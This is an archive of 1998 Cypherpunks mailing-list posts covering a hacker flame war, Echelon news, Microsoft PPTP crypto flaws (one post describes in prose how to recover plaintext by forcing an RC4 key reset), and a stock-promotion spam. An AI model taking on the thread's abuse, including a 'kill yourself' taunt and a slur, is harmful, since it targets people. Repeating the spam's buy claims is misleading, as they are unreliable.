Tag-O-Matic: I love running Windows! NOT!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNXMgd49Co1n+aLhhAQHmjAQArwgJj4kG8O+MYYCag4Xc8vr4zK4XDdGX
niqu8nzfsJPfA2TisyFFyuFv9gejXQ6QhO7+tT2KQbbWJllPBIqIjjIqH8XkhcEW
XhtMV/CoWprOp3tAHZi/n2LLn1kqtdhWG4FewGHn6R0Tzy6vq74ygk+qo9BeZNAd
F92bia6qGio=
=Cvy6
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: J-Dog <J-Dog@Elitehackers.org>
Date: Mon, 1 Jun 1998 16:57:27 -0700 (PDT)
To: Nalus Optic <one4evil@juno.com>
Subject: Re: I need a compiler!
In-Reply-To: <19980601.071648.10254.1.one4evil@juno.com>
Message-ID: <Pine.LNX.3.96.980601163240.16571A-100000@Nigger.EliteHackers.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> >WOW.. A dual PII 266... then you will really be elite... because you
> >know.. if you have a fast machine, you don't ahve to know shit.. you can
> >just  fake it.. because your machine will cover up for you..... fuqin
> >moron...
> 
> First...I am not a hacker and don't pretend to be...I phreak a little and
> like phones and shit...I subscribe to Telecom Digest and just like to
> play with phones...I like to blow shit up for fun so you could say I am a
> pyro...I got five bitches on my dick so you could call me a pimp...But I
> never said I was a hacker...I just like to know about how shit
> works...And in order to exploit any system, for fun or money or super
> 3l33t props, you gots to know the system...I want to put linux on my
> system because linux does have bugs and quirks and you have to know how
> to do more than click a mouse button for the shit to work.
hah.. the fact that you are claiming that you are going to write a
"program" that will combine all the good /h/p/v/c apps out there and
combine them into one is simply ridiculous.. 
what you are claiming is that you are going to write a program that will
have builting crackers, sniffers, DoSes, Tone Generators, Virii creation
utils, box plans...etc. This is absolutely ridiculous...
just for the record, what would you consider the "good /h/p/v/c" apps out
there? the uberl33t winnuke.exe.. or perhaps maybe the k-rad linklooker..
it is ppl like you sho seriously make me wonder where society is headed...

> 
> >bwhahahhaha....if you can not detect the sarcasm in here, then damn, you
> >are a bigger idiot than I thought..... geez man..
> 
> Ya, sure...Sarcasm...You laugh at me but dude...William is to busy with
> Netscape trying to dick him up the ass for me to call him again...
ok hippy.... why don't you sport your /<-rad pvc pants and vinyl shirt and
talk smack about how you are the uberhacker....
I think you have seen Hackers the movie one to many times there acid
burn...

> 
> >> And you know this...MAN!  I am wanting to write my own supper
> program...I
> >> want to take all the good h/p/v/c apps out there and make a nice point
> > >and click interface for them all...one in linux and one in win (
> ...fuck
> >> the mac people... ) Put it all on a CD and send free copies to all the
> >> cool hackers out there...Sort of a library O' chaos...Of coarse, I
> would
> >> not send one to just anyone...r00t would get a copy...I would send
> Eric B
> >> one just for kicks...Then I would send one to Death Vegi and the rest
> of
> >> the cDc...They got the cool philes....Anywhoo...Let me know who bill
> is.
> >Good Yogi, and while your att it, stop world Hunger, Racism, and poverty
> >with your uberhacker program...
> 
> Again, you laugh at me for sarcasm....
hell ya I laugh at you... either you are too big of an idiot to reaalize
that you are being made fun of.. or you are to stupid to care.... at any
rate, kill yourself... you are breating air I might need someday....

> 
> But back to the real problem...yes, gcc would be ideal...How ever...I am
> not running Linux as of yet...so do you or any of you know any OTHER
> WINDOWS BASED COMPILERS that are worth a shit...I know it is a stretch
> but god...
Not running linux as of yet? hehe so when are you gong to do a search for
linux.exe and start to run it?.. as soon as your superkool P2 266 gets
here... wowwie... I am impressed...... Hey DK.. pass me another beer...

> 
> And J-Dog, what is up with the fucked up lingo...This ain't the movies...
fucked up lingo? gee, I am very sorry if your small mind can not make out
my words.. but I can assure you that this is NOT fucked up lingo... go
read some h4x0r Br0s and then tell me about how fuct up my lingo is....

Latez
JD

btw... congrats on your really kool superl33t juno.com account.. you are
r33t now. 
> 
> 
> 
> _____________________________________________________________________
> You don't need to buy Internet access to use free Internet e-mail.
> Get completely free e-mail from Juno at http://www.juno.com
> Or call Juno at (800) 654-JUNO [654-5866]
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Mon, 1 Jun 1998 15:56:14 -0700 (PDT)
To: Doris Woods <dorisaw@idt.net>
Subject: Re: Kirtland Air Force Base
In-Reply-To: <35732427.ECA43EB9@idt.net>
Message-ID: <199806012257.RAA019.42@geiger.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <35732427.ECA43EB9@idt.net>, on 06/01/98 
   at 05:59 PM, Doris Woods <dorisaw@idt.net> said:

>Hi all,

>bill payne wrote:
>> 
>> Saturday 5/30/98 5:15 PM


>> Masanori, the book Decision to Use the Atomic Bomb by Gar Alperovitz
>> presents fairly good evidence some in US government nuked Hiroshima and
>> Nagasaki merely to impress the Russians.
>> 

>Carroll Quigley said in Tragedy and Hope...  they were worried the war
>would be over with before they got their chance to use it!

Was this before or after they estimated that it would cost upwards of 1
Million lives to take the Japan mainland by conventional forces?

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://users.invweb.net/~whgiii/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: I went window shopping...and bought OS/2!

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNXMx849Co1n+aLhhAQEF/QP/Xz/1vWT108GyHjPe77raaL8JQRcfMa7N
fwhcVkQcNMfwMlpEJC3F9eiEk5jpSD5papD3HA8Q7pSDX0vS5L7j7w9d2Xwc1vc/
+uEuZzGUqat5F4P0Iv2/KKPLDHgL/bL+2TkcyyLKkxj0e/IQQWCHIlirDXhY3zz2
TkJqXCgY9Mg=
=a01s
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doris Woods <dorisaw@idt.net>
Date: Mon, 1 Jun 1998 14:59:30 -0700 (PDT)
To: bill payne <billp@nmol.com>
Subject: Re: Kirtland Air Force Base
In-Reply-To: <35709AFC.7DD3@nmol.com>
Message-ID: <35732427.ECA43EB9@idt.net>
MIME-Version: 1.0
Content-Type: text/plain


Hi all,


bill payne wrote:
> 
> Saturday 5/30/98 5:15 PM
> 


> 
> Masanori, the book Decision to Use the Atomic Bomb by Gar Alperovitz
> presents fairly good evidence some in US government nuked Hiroshima and
> Nagasaki merely to impress the Russians.
> 


Carroll Quigley said in Tragedy and Hope...  they were worried the
war would be over with before they got their chance to use it!


Doris




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 2 Jun 1998 23:18:02 -0700 (PDT)
To: masanori fushimi <fushimi@misojiro.t.u-tokyo.ac.jp>
Subject: refrigerator magnet
Message-ID: <35734441.38FF@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Monday 6/1/98 6:05 PM

Masanori

I put the refrigerator magnet

          1945 509th COMPOSITE GROUP 1995

           FIRST ATOMIC BOMBARDMENT

             50th ANNIVERSARY

in the mail to you today.

Reason I sent the magnet is to show THAT THERE ARE SOME REALLY-SICK
MINDS [see reverse side of magnet] IN POWER in the US.

Just got off the phone with John Young.

Governments, including Japan, TRY to mess with peoples'
minds.  There is a book on this.

http://www.amazon.com/exec/obidos/quicksearch-query/002-2147604-1106833

But I have a solution.  I do not read e-mail.  At this time.

I also believe in what Kahn wrote

   Thursday, March 20, 1980, 09:30 David Kahn addressed Congress,
        the Committee on Government Operations.

        Kahn stated to the committee,

             A final benefit is that refusing  to restrict cryptologic
             studies erects yet another rampart against the chipping
away
             of American liberties.  Is this rampart, again, worth the
             danger to national security?  Yes, because the danger is
not
             as acute as the N.S.A. wishes people to see it.  N.S.A.
             wants people to think that publication of cryptologic
             material would slam shut its window into the Third World
             countries.  In fact such publication has little effect ...
             The national security dangers are not so great as to
             dismantle individual freedom.

             For all of these reasons, then, no limitation should be
             placed on the study of cryptology.  And beyond them all
lies
             something more fundamental, in the end, will probably
             prevent any restrictions anyway.  It is called the First
             Amendment.

             I thank you.

I hope you see that I am using the seventh amendment.

http://www.jya.com/whp052898.htm

And even more adamantly I believe

  For what shall it profit a man if he shall gain the whole world and
lose his own soul.

  Kahn on Codes page 172

Best regards
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Tue, 2 Jun 1998 23:23:18 -0700 (PDT)
To: BDGREEN@sandia.gov
Subject: punching the Great FASCIST Satan in the nose
Message-ID: <357352A0.6A81@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Monday 6/1/98 7:16 PM

John Young

The SAND report you posted at http://jya.com/whpfiles.htm was a 
DELIBERATE attempt to send NSA a message.  I had some help
from Sandia classification.

Bill

Subject: 
        refrigerator magnet
  Date: 
        Mon, 01 Jun 1998 18:16:01 -0600
  From: 
        bill payne <billp@nmol.com>
    To: 
        masanori fushimi <fushimi@misojiro.t.u-tokyo.ac.jp>
    CC: 
        cypherpunks@toad.com, ukcrypto@maillist.ox.ac.uk


Monday 6/1/98 6:05 PM

Masanori

I put the refrigerator magnet

          1945 509th COMPOSITE GROUP 1995

           FIRST ATOMIC BOMBARDMENT

             50th ANNIVERSARY

in the mail to you today.

Reason I sent the magnet is to show THAT THERE ARE SOME REALLY-SICK
MINDS [see reverse side of magnet] IN POWER in the US.

Just got off the phone with John Young.

Governments, including Japan, TRY to mess with peoples'
minds.  There is a book on this.

http://www.amazon.com/exec/obidos/quicksearch-query/002-2147604-1106833

David Felton

But I have a solution.  I do not read e-mail.  At this time.

I also believe in what Kahn wrote

   Thursday, March 20, 1980, 09:30 David Kahn addressed Congress,
        the Committee on Government Operations.

        Kahn stated to the committee,

             A final benefit is that refusing  to restrict cryptologic
             studies erects yet another rampart against the chipping
             away of American liberties.  Is this rampart, again, worth
the
             danger to national security?  Yes, because the danger is
             not as acute as the N.S.A. wishes people to see it.  N.S.A.
             wants people to think that publication of cryptologic
             material would slam shut its window into the Third World
             countries.  In fact such publication has little effect ...
             The national security dangers are not so great as to
             dismantle individual freedom.

             For all of these reasons, then, no limitation should be
             placed on the study of cryptology.  And beyond them all
             lies something more fundamental, in the end, will probably
             prevent any restrictions anyway.  It is called the First
             Amendment.

             I thank you.

I hope you see that I am using the seventh amendment.

http://www.jya.com/whp052898.htm

And even more adamantly I believe

  For what shall it profit a man if he shall gain the whole world and
  lose his own soul.

  Kahn on Codes page 172

Best regards
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 1 Jun 1998 16:38:15 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Echelon Furor
Message-ID: <199806012338.TAA09612@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


The UK Sunday Times on the Internet had a story yesterday on
the rising Echelon furor in Europe, "Spy Station F83."

   http://www.sunday-times.co.uk (see Focus feature)

If you don't want to register we've mirrored the piece:

   http://jya.com/nsa-f83.htm

It reviews the rapidly-growing NSA operation at Menwith Hill and 
Bad Aibling, with some recent information not covered in earlier 
reports.

Several European pols -- German, French, Italian, et al -- are 
calling for investigations of alleged economic spying by NSA.

NSA denies all, the writers say, except the Agency claims it's the 
best in the world at what it's capable of but not doing.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Mon, 1 Jun 1998 17:42:49 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Holy QPRNF, part II (Re: Counterpane Cracks MS's PPTP)
In-Reply-To: <199806012143.QAA018.23@geiger.com>
Message-ID: <Pine.SUN.3.91.980601175600.22411B-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain



> >http://www.counterpane.com/pptp.html

	This has got to be the scariest crypto-related paper I've 
	ever read.  Detailed therein is just an unnatural amount of
	screwing up for any one company, much less one product.

	How many of us had to explain to a sci.crypt newbie why we can't 
	use the same one-time-pad string or cipher stream repeatedly?  Here
	we have Microsoft re-using RC4 keys in OUTPUT FEEDBACK MODE.  In the 
	same session, fer God's sake, you and the server both use the same
	XOR stream to encrypt?  

	This is not a subtle, excusable boo-boo.  It's not even a crypto
	mistake:  it's a basic inability to comprehend what the exclusive-or
	operation does.

	I gotta admit, my first impression was that Schneier, et al, 
	were engaging in a heapin' helpin' of MS-bashing on their page.
	Having read the paper, however, I'm now convinced that they
	brushed too (po-)lightly over some real howlers.  One might
	get the false impression that these are subtle flaws, rather
	than gaping holes from Hell.

	We gotta convince Bill to fire his crypto people, for the
	good of humanity.  I suggest we get the message across by
	sending MS a bunch of t-shirts reading, "Everything I ever
	needed to know about crypto I learned from the LANMAN hash."

							-Xcott

==-  Xcott Craver -- Caj@niu.edu -- http://www.math.niu.edu/~caj/  -==
"This is a different thing:  it's spontaneous and it's called 'wit.'"
                                                      -The Black Adder




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 1 Jun 1998 16:51:04 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Commerce Echelon
Message-ID: <199806012350.TAA13897@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


The UK Sunday Times article claims that there is a unit in 
the Department of Commerce that receives NSA Echelon 
interceptions of economic data for massaging and passing 
on to interested US parties. Any information on this unit and 
how it decides who gets which secrets?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Mon, 1 Jun 1998 18:01:56 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: I need a compiler!
In-Reply-To: <Pine.LNX.3.96.980601163240.16571A-100000@Nigger.EliteHackers.org>
Message-ID: <Pine.SUN.3.91.980601195027.22411C-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 1 Jun 1998, J-Dog wrote:

> at any rate, kill yourself... you are breating air I might need someday...

	Ah, lack of oxygen!  I was going to blame a broken CAPS LOCK key.
	
								-Caj

==-  Xcott Craver -- Caj@niu.edu -- http://www.math.niu.edu/~caj/  -==
"This is a different thing:  it's spontaneous and it's called 'wit.'"
                                                      -The Black Adder
	




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Mon, 1 Jun 1998 18:33:48 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Commerce Echelon
In-Reply-To: <199806012350.TAA13897@camel14.mindspring.com>
Message-ID: <v04003a02b19904c079f3@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:48 PM -0400 on 6/1/98, John Young wrote:


>  Any information on this unit and
> how it decides who gets which secrets?

It helps if you're Chinese or Indonesian...

Cheers,
Bob Hettinga

-----------------
Robert A. Hettinga
Philodox Financial Technology Evangelism
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'
Philodox: <http://www.philodox.com>, e$: <http://www.shipwright.com/>
          <mailto: rah@philodox.com>     <mailto: rah@shipwright.com>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan <alan@ctrl-alt-del.com>
Date: Mon, 1 Jun 1998 22:23:25 -0700 (PDT)
To: Chris Wedgwood <chris@cybernet.co.nz>
Subject: Re: Counterpane Cracks MS's PPTP
In-Reply-To: <199806012143.QAA018.23@geiger.com>
Message-ID: <3.0.5.32.19980601220343.04443930@ctrl-alt-del.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:23 PM 6/2/98 +1200, Chris Wedgwood wrote:
>
>On Mon, Jun 01, 1998 at 04:24:44PM -0500, William H. Geiger III wrote:
>
>> Previous security foobars by M$:
>> 
>> NT C2 <---- LOL!!!
>
>Standard marketroid talk, I think M$ still tout this, but not so loudly
>these days. Last I heard they were trying to get C2 with network
>connectivity, but that was a while ago (2 years?) so they may have given up.
>I'm sure I would have heard if it had.
>
>That said, C2 doesn't necessarily buy you all that much.

Is this not what they claimed when they sold NT to the Air Force?  Judging
by some of the Air Force software I have seen, this frightens me more than
most things.

>> Active X <---- Who was the brain child that though *that* up?
>
>Sure it sucks, it sucks for lots of reasons. But for the average luser it
>still better than plugins so thats why its taken off. And what make
>downloading a plugin and installing that any better? 

You have a little more control over plug-ins.

>> Auto-Launch attached binaries in E-Mail <-- Can we say GoodTimes?
>
>Can anyone confirm that this has indeed been fixed yet?
>
>I should also point out that buffer overflow bugs have been known for some
>time (years?) with various unix mailers and their handling of .mailcap which
>essentially amounts to the same thing.

But those are specific to the client.  Most Unix users know better.

>> Crypto-API <--- Right I would *trust* that. Honest. :)
>
>Does anyone have a list of design and implementation flaws for CAPI? I've
>had discussions with a couple of people about these, but never seen anything
>published.

I know of one, but I cannot release details yet.  (I did not discover it
and i need to wait until the non-beta version of the product is released.)
Besides, I have been told I will be killed if I reveal it before it is time.

>> TCP/IP Stack <--- Too many flaws to list.
>
>Yeah... its crap, but not necessarily that much worse that some of the
>others out there. If someone were keeping score on which stacks help up the
>best against all the attacks of the last two years it probably wouldn't be
>the worst.

A great deal of this blame can be placed on the WinSock spec.  The spec was
quite "loose" in many details of the implementation.  You could be
complient and still not be able to deal with much of the software out
there.  My vote for bad PC stack of the century was the one put out by Sun.
 Not even close to compatible...

>> Why would anyone trust these simpletons to produce any type of security
>> product?
>
>Sure. 95% of the population does.

Sturgeon's law applies to people as well...

>People need to be educated about important issues, and using lots of
>complicated gobbledygook doesn't help. If you, like me, have a loved one
>that isn't terribly interested in computers or encryption, then see if the
>phrase 'modular exponentiation' doesn't kick there eye-glaze-secreting gland
>into over drive.

Most everything involving computers tends to do that.

>I guess this is something Bruce Schneier has done well - a report for
>technical people who will read it, laugh and say they aren't surprised, and
>press releases with LOTS OF BIG LETTERS AND SMALL WORDS for the rest of the
>population including morons that are the media.

You can type it out in clear, short sentences and the media will still
screw it up.  If you have no clue as to what you are writing about, the
accuracy of what you write will suffer.

>I think everyone is waiting for NT5. Multi-user NT is at best an interesting
>concept. I remember at university using (arguably buggy) unix boxen with
>200+ users simultaneously, with relatively few problems, but I'll be really
>surprised if NT could get close to this....

Multi-user NT is available now.  Citrix and NCD both have versions out now.
 (Both are based on NT 3.51.  They would have released a 4.0 product long
ago, but Microsoft wanted the product for themselves.)  The server load
seems to be about 50 users per box.   Depends on what you are running.

>I am so looking forward to NT5, it should prove to be very entertaining and
>perhaps a really good opportunity to educate the public.

Assuming that they can be educated.  Better to offer them a choice.  It is
hard to say "X is bad" unless you have an alternative.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Turner <cyburai@earthlink.net>
Date: Mon, 1 Jun 1998 21:27:50 -0700 (PDT)
Subject: Tax revolt book
Message-ID: <199806020427.VAA06278@italy.it.earthlink.net>
MIME-Version: 1.0
Content-Type: text/plain


C-punks,

my apologies if this book was discussed on the list back when it first 
came out...
in the course of cleaning up and packing in preparation for our move, I 
came across Bill Branon's first book, _Let Us Prey_. W/out going into any 
detail, the backdrop of the book takes place in present-day America where 
a sort of tax revolt is going on - over 1/3 of the taxpayers filed a Form 
4868 - an automatic extension form - and 22% of those filers failed to 
enclose a check of any kind.

There's a great part where the prez is freaking out because 1/3 of 
Americans are getting a gov't check of some kind and where the hell are 
they going to get the money when over another 1/3 of Americans won't pay 
their taxes.

I highly recommend it.

Take care all, and watch your six,

Chris
---
Ubi dubium ibi libertas
Where there is doubt, there is freedom  -Latin proverb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Mon, 1 Jun 1998 21:19:17 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: I need a compiler!
Message-ID: <8d3fc421.35737c2b@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 6/1/98 7:11:19 PM Central Daylight Time, J-
Dog@Elitehackers.org writes:

<< (1 4 Evil)> Ya, sure...Sarcasm...You laugh at me but dude...William is to
busy with
 > Netscape trying to dick him up the ass for me to call him again...
 ok hippy... >>

Hey, I didn't say that!  Why are you talking to me?

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Mon, 1 Jun 1998 21:25:13 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Counterpane Cracks MS's PPTP
Message-ID: <e01acc58.35737d7c@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 6/1/98 10:38:20 PM Central Daylight Time,
chris@cybernet.co.nz writes:

<< > Auto-Launch attached binaries in E-Mail <-- Can we say GoodTimes?
 
 Can anyone confirm that this has indeed been fixed yet? >>

It was my understanding, that the so-called GoodTimes virus was a farce,
apparently aimed at specific commercial spammers.

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David E. Smith" <dave@bureau42.ml.org>
Date: Mon, 1 Jun 1998 22:17:55 -0700 (PDT)
To: Nalus Optic <one4evil@juno.com>
Subject: Re: I need a compiler!
In-Reply-To: <19980601.071648.10254.1.one4evil@juno.com>
Message-ID: <Pine.LNX.3.96.980602044830.7898B-100000@bureau42.ml.org>
MIME-Version: 1.0
Content-Type: text/plain


> But back to the real problem...yes, gcc would be ideal...How ever...I am
> not running Linux as of yet...so do you or any of you know any OTHER
> WINDOWS BASED COMPILERS that are worth a shit...I know it is a stretch
> but god...

um... so, why not get the Win32 port of GCC?

...dave


----- David E. Smith, P O Box 324, Cape Girardeau MO 63702
http://bureau42.base.org/people/dave/ dave@bureau42.ml.org





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Tue, 2 Jun 1998 05:19:38 -0700 (PDT)
To: rah@shipwright.com (Robert Hettinga)
Subject: Re: Commerce Echelon
In-Reply-To: <v04003a02b19904c079f3@[139.167.130.247]>
Message-ID: <199806021218.IAA27678@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain




Robert Hettinga wrote:

| >  Any information on this unit and
| > how it decides who gets which secrets?
| 
| It helps if you're Chinese or Indonesian...

I am shocked, shocked, to hear you suggest such a thing about our
government.  They don't care about these people's ethnicity, only
their wallets.

Thus, its helps if you're rich or stinkin' rich.  That it came from
the sweat of the peasants doesn't matter a whit.

Adam


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Kemp <kemp@indusriver.com>
Date: Tue, 2 Jun 1998 06:09:55 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Counterpane Cracks MS's PPTP
In-Reply-To: <Version.32.19980601122218.00fbc410@pop.pipeline.com>
Message-ID: <3.0.3.32.19980602090947.0317cc10@pop3.indusriver.com>
MIME-Version: 1.0
Content-Type: text/plain



This is a good paper. It covered almost all of the failures of MS PPTP.  
However, I think it missed a big one.
It is possible to recover all the clear text from a PPTP session,
even if most of the traffic is going in one direction only.
The failure is in MPPE.  When MPPE gets a sequenceing error, it
resets the key.  This causes the cipher stream to be reset.  It is
partially covered in section 5.4 .
Since RC4 is a stream cipher, it generates the same
cipher stream for a given key.  This cipher stream is XORed with the clear
text.
To recover the clear text, an attacker just needs to force a
resyncronization by
sending a packet that has a bogus coherency count.  
If the attacker captures the original stream and the resynchronized stream
a simple XOR of the two streams results in an XOR of the cleartext.
While compression does make it harder to determine what the cleartext is,
It is likely that a determined attacker can decrypt and decompress the
XORed result.  
Brad
Brad Kemp
Indus River Networks, Inc.                   BradKemp@indusriver.com
31 Nagog Park						 978-266-8122
Acton, MA 01720                              fax 978-266-8111




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Iain Collins <icollins@sol.co.uk>
Date: Tue, 2 Jun 1998 01:45:25 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: I need a compiler!
Message-ID: <3573BB3C.BFF57DC@sol.co.uk>
MIME-Version: 1.0
Content-Type: text/plain


>> And J-Dog, what is up with the fucked up lingo...This ain't the
movies...
>fucked up lingo? gee, I am very sorry if your small mind can not make
out
>my words.. but I can assure you that this is NOT fucked up lingo... go
>read some h4x0r Br0s and then tell me about how fuct up my lingo is....

>
>Latez
>JD
>
>btw... congrats on your really kool superl33t juno.com account.. you
are
>r33t now.

Both of you lose all all guru/elite points accumulated thus far by
wasting bandwidth due to (repeatedly) inapproproately posting to the
CypherPunks mailling list. Doh!

Iain Collins, icollins@sol.co.uk






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <paulmerrill@acm.org>
Date: Tue, 2 Jun 1998 09:37:48 -0700 (PDT)
To: Iain Collins <icollins@scotland.net>
Subject: Re: Counterpane Cracks MS's PPTP
In-Reply-To: <002301bd8e39$c8b18880$c7f3b094@webadmin.sol.co.uk>
Message-ID: <3574553D.3F0BE65A@acm.org>
MIME-Version: 1.0
Content-Type: text/plain




Iain Collins wrote:
<<snip>>

> I beleive that no operating system has ever been given a C2 certification,
> and that only indiviual installations can be certifed.
>

Both Right and WrongC2 (or other) certification is given to a product system,
not an OS  nor an installation.  NT on a specific configuration of a specific
manufacturer, fo instance. (and with a specific mix of other software)  The
intent was to make available Commercial Off The Shelf (COTS) systems for gov
purchase.)  But the concept was generated in the mainframe/Mini frame of mind.

> This requries that each installation be transported and conducted under
> armed guard, which is case with certain US government Microsoft NT
> Workstation installations.
>
> It is also stated (somewhere, but I don't have the details to hand) that no
> C2 rated system should be plugged in to an external network connection (i.e.
> the internet), and that only connections to secure LAN's/WAN's are permitted
> (otherwise the C2 certification is meaningless, hence why NT Sever has never
> been C2 certified IIRC).
>

The network issue is one with deep ramifications and not as simple as listed in
the above Para.  Two totally secure nets can be not secure when connected to
each other because of the data interface for security levels, user permisisions
etc.

> I would be grateful if anyone can categorically deny or in any way support
> this.
>

NCSC has a whole line of books on it all.  Red is the Network Interpretation,
Orange is the Criteria itself.

> <<SNIP>>

PHM

author, NOT the Orange Book -- A Guide to the Definition, Specification,
Tasking, and Documentation for the Development of Secure Computer Systems --
Including Condensations of the Memebers of the Rainbow Series and Related
Documents, Merlyn Press, WPAFB, 1992

NTOB is available for those who want it.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vac22737889@msn.com
Date: Sat, 6 Jun 1998 01:54:37 -0700 (PDT)
To: vac22737889@msn.com
Subject: RE: URGENT BUY RECOMMENDATION
Message-ID: <221548788987.MAA45587@mail.msn.com>
MIME-Version: 1.0
Content-Type: text/plain


R & R Resources.
Symbol: R R R I
Recent Price: 8 3/4 ($8.75/share)

Wall Street analysis from Harvard Equity Research has issued a STRONG
BUY recommendation on RRRI stock.  Robert Renquist was quoted as
predicting a $13.50-$15.00 price near-term with "the high probability of
continuing  appreciation during the 4th quarter of 1998".

Harvard Equity Research's recommendation AATK went
from $3 to $9.00 in ten trading days!

Harvard Equity Research is so confident of their projections that they
are offering their subscribers a money-back guarantee on their
subscription if RRRI doesn't at least double within the next year.

To reiterate: an IMMEDIATE & STRONG BUY recommendation
on RRRI.

For further information go to:
http://quote.yahoo.com/
or send a SASE, for a free issue of Harvard Equity Research's latest
top-rated newsletter, to:H.E.R., 35 rue des Bains, CH-1205 Geneve,
Switzerland. 

















From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Chris Wedgwood <chris@cybernet.co.nz>
Date: Mon, 1 Jun 1998 20:24:24 -0700 (PDT)
To: "William H. Geiger III" <jya@pipeline.com>
Subject: Re: Counterpane Cracks MS's PPTP
In-Reply-To: <Version.32.19980601122218.00fbc410@pop.pipeline.com>
Message-ID: <19980602152326.B32084@caffeine.ix.net.nz>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, Jun 01, 1998 at 04:24:44PM -0500, William H. Geiger III wrote:

> Previous security foobars by M$:
> 
> NT C2 <---- LOL!!!

Standard marketroid talk, I think M$ still tout this, but not so loudly
these days. Last I heard they were trying to get C2 with network
connectivity, but that was a while ago (2 years?) so they may have given up.
I'm sure I would have heard if it had.

That said, C2 doesn't necessarily buy you all that much.

> Active X <---- Who was the brain child that though *that* up?

Sure it sucks, it sucks for lots of reasons. But for the average luser it
still better than plugins so thats why its taken off. And what make
downloading a plugin and installing that any better? 

> Auto-Launch attached binaries in E-Mail <-- Can we say GoodTimes?

Can anyone confirm that this has indeed been fixed yet?

I should also point out that buffer overflow bugs have been known for some
time (years?) with various unix mailers and their handling of .mailcap which
essentially amounts to the same thing.

> Crypto-API <--- Right I would *trust* that. Honest. :)

Does anyone have a list of design and implementation flaws for CAPI? I've
had discussions with a couple of people about these, but never seen anything
published.

> TCP/IP Stack <--- Too many flaws to list.

Yeah... its crap, but not necessarily that much worse that some of the
others out there. If someone were keeping score on which stacks help up the
best against all the attacks of the last two years it probably wouldn't be
the worst.

> Why would anyone trust these simpletons to produce any type of security
> product?

Sure. 95% of the population does.

People need to be educated about important issues, and using lots of
complicated gobbledygook doesn't help. If you, like me, have a loved one
that isn't terribly interested in computers or encryption, then see if the
phrase 'modular exponentiation' doesn't kick there eye-glaze-secreting gland
into over drive.

I guess this is something Bruce Schneier has done well - a report for
technical people who will read it, laugh and say they aren't surprised, and
press releases with LOTS OF BIG LETTERS AND SMALL WORDS for the rest of the
population including morons that are the media.

I think everyone is waiting for NT5. Multi-user NT is at best an interesting
concept. I remember at university using (arguably buggy) unix boxen with
200+ users simultaneously, with relatively few problems, but I'll be really
